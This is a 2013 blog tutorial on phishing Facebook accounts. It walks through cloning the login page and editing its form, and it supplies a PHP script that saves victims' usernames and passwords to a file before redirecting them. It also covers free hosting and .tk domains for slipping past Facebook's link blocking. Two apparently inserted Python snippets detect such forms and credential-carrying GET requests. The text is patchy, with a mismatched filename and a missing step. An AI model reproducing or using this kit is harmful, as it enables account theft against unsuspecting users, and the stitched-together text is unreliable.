Wednesday, 25 December 2013

How Hackers Hack Facebook Accounts Using a Phishing Attack

WHAT IS PHISHING?
Phishing is a technique for attempting to acquire sensitive or confidential information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. This is done with the help of a phisher.


WHAT IS A PHISHER?
A phisher is a fake page that looks exactly like an original login page and writes the victim's login data (username and password) to a specific file, or does whatever you want so long as you get access to the victim's login data.
Here is an example of a fake Facebook login page (phisher):




 HOW TO MAKE A PHISHER?
As the saying goes:

  • Don't give plenty of FISH to your friend. Instead, you should teach him how to PHISH.

Therefore, instead of just giving you the download link to an already made phishing page, I am going to teach you how to make your own phishing page. At the end of this tutorial I will put a download link to my already made phishing pages, but first you have to learn how to make your own phisher :D

To create a successful phisher, all you need is a PHP enabled site, Notepad on your computer and a brain.

You can download Notepad v5.9++ here

Here is a list of php enabled free hosting sites:



In this tutorial I am going to focus mainly on how to prepare a phishing attack on Facebook. I am going to use Mozilla Firefox as the browser and http://my3gb.com as the hosting site; it's much easier.

STEP 1 -Creating the fake page

  • Go to facebook's login page http://www.facebook.com
  • On the top left corner of your Firefox browser, Click File ->Save page As and save your page name as facebook.html
  • Open facebook.html Using Notepad and search for the word ''action''

You will find it on a line that looks like this;

class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form"

  • Now change the method to ''get'' and action to ''login.php'' so that you will have something that looks like this;
class="menu_login_container"><form method="get" action="login.php" id="login_form"
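
From the defender's side, the edit described in Step 1 leaves a recognisable fingerprint: a password field whose form is submitted with GET, over plain HTTP, to a host that does not belong to the brand. The Python check below is an added example, not code from the original post; `LoginFormAuditor`, `audit_page`, the `name="pass"` field and the sample markup are constructed for illustration, and it assumes the page has already been flagged as imitating the brand.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class LoginFormAuditor(HTMLParser):
    """Collects every <form> and records whether it holds a password input."""
    def __init__(self):
        super().__init__()
        self.forms, self._open = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"method": (a.get("method") or "get").lower(),
                          "action": a.get("action") or "", "password": False}
            self.forms.append(self._open)   # recorded even if </form> is missing
        elif tag == "input" and self._open and (a.get("type") or "").lower() == "password":
            self._open["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def is_brand_host(host, brand_hosts):
    # Exact match or a true subdomain; "facebook.com.evil.test" does not qualify.
    return any(host == b or host.endswith("." + b) for b in brand_hosts)

def audit_page(html, page_url, brand_hosts):
    """Return the reasons a password form on page_url looks like a credential trap."""
    parser = LoginFormAuditor()
    parser.feed(html)
    parser.close()
    findings = []
    for form in parser.forms:
        if not form["password"]:
            continue
        # A relative action such as "login.php" resolves against the hosting page.
        target = urlsplit(urljoin(page_url, form["action"]))
        host = target.hostname or ""
        if form["method"] == "get":
            findings.append("password submitted via GET")
        if target.scheme != "https":
            findings.append("credentials sent without TLS")
        if not is_brand_host(host, brand_hosts):
            findings.append("form target is not a brand host: " + host)
    return findings

# Constructed samples: the genuine form line quoted above and its edited copy.
GENUINE = ('<form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" '
           'id="login_form"><input type="password" name="pass"></form>')
CLONE = '<form method="get" action="login.php" id="login_form"><input type="password" name="pass"></form>'
```

Run against the genuine markup served from `https://www.facebook.com/` the function returns no findings; run against the edited copy served from the hosting URL it returns all three.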


STEP 2 - Preparing the php script
  • To create a php file, simply paste the code below into your notepad. Then save it as login.php

------------------------------------------------------------------------------
<?php
header("Location: http://facebook.com/login.php ");
$handle = fopen("noobs.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


------------------------------------------------------------------------------

Note that in the above script, ''phished.txt'' is the file on which all hacked usernames and passwords will be saved and ''https://facebook.com/login.php'' is the original Facebook url where your victim will be redirected to after clicking the login button on your fake page. But at the moment Facebook has tightened its security, whereby your victim will get notified of a phishing attack and would therefore be prompted to change his password right after arriving from a phishing page.

To avoid this, you should redirect your victim to any other url which is not of Facebook by replacing https://facebook.com/login.php with any url. Choosing the url to redirect your victim to will all depend on the trick that you will use against your victim in the whole phishing process.

Please also note that this part is mainly for Facebook. It's ok with several other sites like gmail, hotmail etc.; your victim will not get a warning message, including mobile Facebook (http://m.facebook.com).
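
Because the script above reads the submitted fields from the query string, the password appears in the request URL and therefore in every proxy and web-server log on the path. The Python detection below is an added example, not part of the original post: the log format, the sample lines, the parameter-name list and `find_credential_gets` are constructed assumptions. It flags GET requests that carry a password-like parameter and notes whether the response redirected to another host, whatever that host is.

```python
from urllib.parse import urlsplit, parse_qs

# Assumed parameter names that indicate a password travelling in a URL.
SECRET_PARAMS = {"pass", "password", "passwd", "pwd"}

# Constructed proxy log lines: time client method url status redirect_target
SAMPLE_LOG = """\
2013-12-25T10:01:02Z 10.0.0.5 GET http://www.yourusername.my3gb.com/facebook.html 200 -
2013-12-25T10:01:40Z 10.0.0.5 GET http://www.yourusername.my3gb.com/login.php?email=user%40example.test&pass=REDACTED 302 http://facebook.com/login.php
2013-12-25T10:02:10Z 10.0.0.9 GET http://intranet.example.test/search?q=password+policy 200 -
2013-12-25T10:03:00Z 10.0.0.7 POST https://www.facebook.com/login.php?login_attempt=1 302 https://www.facebook.com/
"""

def find_credential_gets(log_text):
    """Return one alert per GET request whose query string carries a password field."""
    alerts = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue                      # skip malformed lines
        when, client, method, url, status, location = parts
        if method != "GET":
            continue
        target = urlsplit(url)
        # Match on parameter NAMES only, so a search for the word "password" is ignored.
        names = parse_qs(target.query).keys()
        leaked = sorted(n for n in names if n.lower() in SECRET_PARAMS)
        if not leaked:
            continue
        redirect_host = urlsplit(location).hostname if status.startswith("3") else None
        alerts.append({
            "time": when,
            "client": client,
            "host": target.hostname,
            "params": leaked,             # names only; the secret value is never copied
            "offsite_redirect": bool(redirect_host) and redirect_host != target.hostname,
        })
    return alerts
```

An alert identifies the client whose credentials need resetting and the host to report to the hosting provider.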

STEP 3- Create File where to save hacked passwords 
  • Create an empty text file using notepad and rename it as phished
Note that when creating the text file, there is no need of renaming it as phished.txt because the fact that you will save it as a text file is enough to make it bear the extension of txt

Now you have 3 files so far;
  1. facebook.html
  2. login.php
  3. phished.txt
 STEP 5- Uploading the 3 files

Now go to http://my3gb.com and sign up for a free hosting account, then upload the 3 files.
If your phisher has successfully been made, any email address and passwords that are typed on your fake page will be saved on the ''phished.txt'' file.



The link to your phishing page will therefore be; 
www.yourusername.my3gb.com/facebook.html

NOTE THAT:

  1. No One will be so dumb to click on such a link
  2. Facebook will automatically block your phishing url from being posted on Facebook
To overcome the above situation you need to rename your phishing link using a ''dot.tk'' domain. To be able to do this, go to www.dot.tk and register. After that, login to your account and click on ''Add a new free domain now'' and follow the rest of the steps.

Your dot.tk domain name will look like this: www.anyname.tk. Any clicks on this link will be forwarded to your fake Facebook page.
The good part is that..
 
  • You can rename the phishing link to suit your victim's curiosity, thereby making it difficult for him to notice any phisher
  • Your phisher will NOT be detected and blocked by Facebook, so you are free to post it or send it to a friend on Facebook via inbox.

Hope you enjoyed the tutorial.
